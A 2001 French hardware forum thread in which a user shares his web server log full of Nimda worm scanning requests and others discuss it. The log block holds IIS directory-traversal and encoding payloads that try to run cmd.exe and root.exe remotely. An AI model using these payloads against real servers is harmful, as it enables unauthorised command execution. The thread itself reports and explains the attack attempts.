Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2627 connectés 

  FORUM HardWare.fr
  Windows & Software

  C'était bien tenté...

 
 


Dernière réponse
Sujet : C'était bien tenté...
Sly Angel http://www.sophos.com/downloads/nimda.exe pour le virus envoyé par la page web ( avec mes plus plates excuses )
 

Code :
  1. servermms: /usr/sbin# cat /var/log/httpd/access.log | wc -l             
  2.   11609
  3. servermms: /usr/sbin# cat /var/log/httpd/access.log | grep "c+dir" | wc -l
  4.   10674


 
Darthnet : c'est quoi alors ? Si c'est pour jouer sur les mots... C'est pas du hack c'est un worm :p Il s'appelle Nimda et il est un peu trop répendu à mon gout :)
 
infos sur http://www.securityspace.org/smyse [...] a_amm.html

 

[edtdd]--Message édité par Sly Angel--[/edtdd]

Votre réponse
Nom d'utilisateur    Pour poster, vous devez être inscrit sur ce forum .... si ce n'est pas le cas, cliquez ici !
Le ton de votre message                        
                       
Votre réponse
[b][i][u][strike][spoiler][fixed][cpp][url][email][img][*]   
 
   [quote]
 
Options

 
Vous avez perdu votre mot de passe ?


Vue Rapide de la discussion
Sly Angel http://www.sophos.com/downloads/nimda.exe pour le virus envoyé par la page web ( avec mes plus plates excuses )
 

Code :
  1. servermms: /usr/sbin# cat /var/log/httpd/access.log | wc -l             
  2.   11609
  3. servermms: /usr/sbin# cat /var/log/httpd/access.log | grep "c+dir" | wc -l
  4.   10674


 
Darthnet : c'est quoi alors ? Si c'est pour jouer sur les mots... C'est pas du hack c'est un worm :p Il s'appelle Nimda et il est un peu trop répendu à mon gout :)
 
infos sur http://www.securityspace.org/smyse [...] a_amm.html

 

[edtdd]--Message édité par Sly Angel--[/edtdd]
darthnet J'ai deja eu ça , mais c pas du hack :)
louisebrooks vu le timing dans le fichier log, d'après la periode en deux commande GET très cours, je dirais que c'est un soft qui fait un scran des répertoire web classiques.
French_Phoenix pardon de la confusion  :jap:  ;)  :D
Sly Angel

french_phoenix a écrit a écrit :

conclusion : ton pirate sly CT un virus  :D  ;)  




 
non conclusion : c'est pas le proprio de la machine qui fait ça mais un mec qui a hacké cette machine et a foutu de la merde partout y compris sur la page web :)

Sly Angel

boisorbe a écrit a écrit :

gros malin je viens d'allersur cette page et la
[#f00e00]ALERTE VIRAL NIMBA[#ff0000]
ALLER TOUS LIRE CA  
http://www.01net.com/rdn?oid=160272&rub=2135
ET metter vos antivirus a jour car avec des supers liens comme celui la tous le forum va etre contamine  




 
Oups bah désolé hein j'ai été voir avec Mozilla moi, j'ai rien vu :D
 
Bon je retire le lien :)
 
En plus il était tard, là ce matin j'ai un log 20 fois plus rempli de ce genre de hack attempt :)

French_Phoenix conclusion : ton pirate sly CT un virus  :D  ;)
French_Phoenix 1. J'ai IE6
2. J'ai pas de compte mail configurer sur ma machine  ;)
3. Mon anti-virus date d'hier  :D  :D

 

[edtdd]--Message édité par french_phoenix--[/edtdd]
boisorbe gros malin je viens d'allersur cette page et la
[#f00e00]ALERTE VIRAL NIMBA[#ff0000]
ALLER TOUS LIRE CA  
http://www.01net.com/rdn?oid=160272&rub=2135
ET metter vos antivirus a jour car avec des supers liens comme celui la tous le forum va etre contamine
French_Phoenix ben l'adresse IP que tu donne ca tombe sur un site hacké ??
C'est bien linux qd même pour faire serveur web  :D  :D
Sly Angel :lol:  
 
Sacré Gilou :D ( c'est vrai qu'il est mieux ici quand même finalement :) )
Sly Angel :cry: :cry: :cry:
 
J'ai hésité à plutôt le foutre sur soft & reseau, bah j'aurais du :sweat:
 
Me demander si je vais le déplacer moi même là :D
Clarinette

KromaXamorK a écrit a écrit :

:pt1cable: j'ai rien compris :D  




Moi non plus :D

totoz

Sly Angel a écrit a écrit :

 
 
:cry:  



:D  :lol:

Sly Angel

totoz a écrit a écrit :

normal, c fait pour :D  




 
:cry:

Sly Angel bon en fait quand tu vas sur un site web, le site lui il garde une trace de ton passage, un fichier log ou y'a ton IP, l'heure de visite et ce que tu as demandé.
 
Là le gars demande au server des trucs qui sont censés être des failles dans le server qui permettent de s'en servir comme si c'était ta machine alors que normalement t'es simple visiteur et d'y foutre la merde que tu veux :)
 
Un peu comme si une adresse speciale du forum te permettait de modifier des choses dessus alors que normalement tu en peux pas :)
totoz

KromaXamorK a écrit a écrit :

:pt1cable: j'ai rien compris :D  



normal, c fait pour :D

KromaXamorK :pt1cable: j'ai rien compris :D
Sly Angel c'est un fichier de log de server web, il a essayé des combinaisons qui sur des NT pas protégés permet d'avoir un accés a la machine :)
 
En fait je viens de configuré mes logs sur mon server tout fraichement installé et bah je mets ça mais là y'a 10 fois ça en plus en 30 min :/ ( et de 10 IP différentes )
 
c'est meme pas forcement le proprietaire du server qui est en cause mais plutot les mecs qui l'ont hacké de la meme maniere :)
KromaXamorK c'est quoi tout ce charabia ???
totoz :lol:
Sly Angel

Code :
  1. 193.12.13.31 - - [20/Sep/2001:03:52:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
  2. 193.12.13.31 - - [20/Sep/2001:03:52:07 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
  3. 193.12.13.31 - - [20/Sep/2001:03:52:08 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
  4. 193.12.13.31 - - [20/Sep/2001:03:52:09 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
  5. 193.12.13.31 - - [20/Sep/2001:03:52:09 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
  6. 193.12.13.31 - - [20/Sep/2001:03:52:13 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
  7. 193.12.13.31 - - [20/Sep/2001:03:52:14 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
  8. 193.12.13.31 - - [20/Sep/2001:03:52:14 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
  9. 193.12.13.31 - - [20/Sep/2001:03:52:15 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
  10. 193.12.13.31 - - [20/Sep/2001:03:52:15 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
  11. 193.12.13.31 - - [20/Sep/2001:03:52:16 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
  12. 193.12.13.31 - - [20/Sep/2001:03:52:16 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
  13. 193.12.13.31 - - [20/Sep/2001:03:52:17 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
  14. 193.12.13.31 - - [20/Sep/2001:03:52:17 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
  15. 193.12.13.31 - - [20/Sep/2001:03:52:18 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
  16. 193.12.13.31 - - [20/Sep/2001:03:52:18 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
  17. 193.121.213.1 - - [20/Sep/2001:03:53:16 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
  18. 193.121.213.1 - - [20/Sep/2001:03:53:19 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281


 
Mais c'est con quand même d'essayer de hacker un NT sur une machine qui tourne sous linux :D ( bon maintenant c'ets moi qui vais jouer avec lui :D )

 

[edtdd]--Message édité par Sly Angel--[/edtdd]

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo

Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)